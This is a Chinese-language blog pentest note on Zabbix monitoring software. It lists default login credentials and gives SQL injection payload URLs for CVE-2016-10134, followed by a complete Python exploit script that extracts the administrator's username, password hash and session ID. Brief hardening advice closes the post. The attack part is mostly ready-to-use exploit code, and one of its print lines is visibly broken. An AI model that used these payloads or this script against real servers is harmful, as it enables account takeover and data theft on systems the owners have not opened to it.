Zabbix介紹
zabbix([`z?biks])是一個基于WEB界面的提供分布式系統監視以及網路監視功能的企業級的開源解決方案,
zabbix能監視各種網路引數,保證服務器系統的安全運營;并提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種問題,
zabbix由2部分構成,zabbix server與可選組件zabbix agent,
zabbix server可以通過SNMP,zabbix agent,ping,埠監視等方法提供對遠程服務器/網路狀態的監視,資料收集等功能,它可以運行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平臺上,
弱口令
("admin","zabbix"),("Admin","zabbix"),("guest","")
SQL注入(CVE-2016-10134)
- 受影響版本:2.2.x,3.3.0-3.03
- letest.php
這個頁面需要登錄
payload:
http://ip:port/latest.php?output.php=ajax&sid=93162393a6bd9b9d&favobj=toggle&toggle_open_state=1&toggle_ids=updatexml(0,concat(0xa,database()),0)
sid=cookie zbx_sesseionid的后16位
- jsrpc.php
頁面無需登錄
payload:
http://ip:port/jsrpc.php?type=0&mode=1&method=screen.get&profileldx=web.item.graph&resourcetype=17 &profileldx2=updatexml(0,concat(0xa,database()),0)
- exp
#!/usr/bin/env python
# -*- coding: utf_8 -*-
# Date: 2016/8/18
# Created by 獨自等待
# 博客 http://www.waitalone.cn/
import urllib2
import sys, os
import re
def deteck_Sql():
u'檢查是否存在SQL注入'
payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(url + payload, timeout=10).read()
except Exception, msg:
print msg
else:
key_reg = re.compile(r"INSERT\s*INTO\s*profiles")
if key_reg.findall(response):
return True
def sql_Inject(sql):
u'獲取特定sql陳述句內容'
payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(payload, timeout=10).read()
except Exception, msg:
print msg
else:
result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
results = result_reg.findall(response)
if results:
return results[0]
if __name__ == '__main__':
# os.system(['clear', 'cls'][os.name == 'nt'])
print '+' + '-' * 60 + '+'
print '\t Python Zabbix print '\t Blog:http://www.waitalone.cn/'
print '\t\t Code BY: 獨自等待'
print '\t\t Time:2016-08-18'
print '+' + '-' * 60 + '+'
if len(sys.argv) != 2:
print '用法: ' + os.path.basename(sys.argv[0]) + ' Zabbix 網站地址'
print '實體: ' + os.path.basename(sys.argv[0]) + ' http://www.waitalone.cn/'
sys.exit()
url = sys.argv[1]
if url[-1] != '/': url += '/'
passwd_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
session_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
if deteck_Sql():
print u'Zabbix 存在SQL注入漏洞!\n'
print u'管理員 用戶名密碼:%s' % sql_Inject(passwd_sql)
print u'管理員 Session_id:%s' % sql_Inject(session_sql)
else:
print u'Zabbix 不存在SQL注入漏洞!\n'
防御
zabbix放置在內網,不要暴露外網
修改默認的口令密碼
禁止guest用戶
禁止以root啟動
401認證
舊版本備份資料-升級zabbix版本
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/30899.html
標籤:其他
上一篇:常見中間件弱口令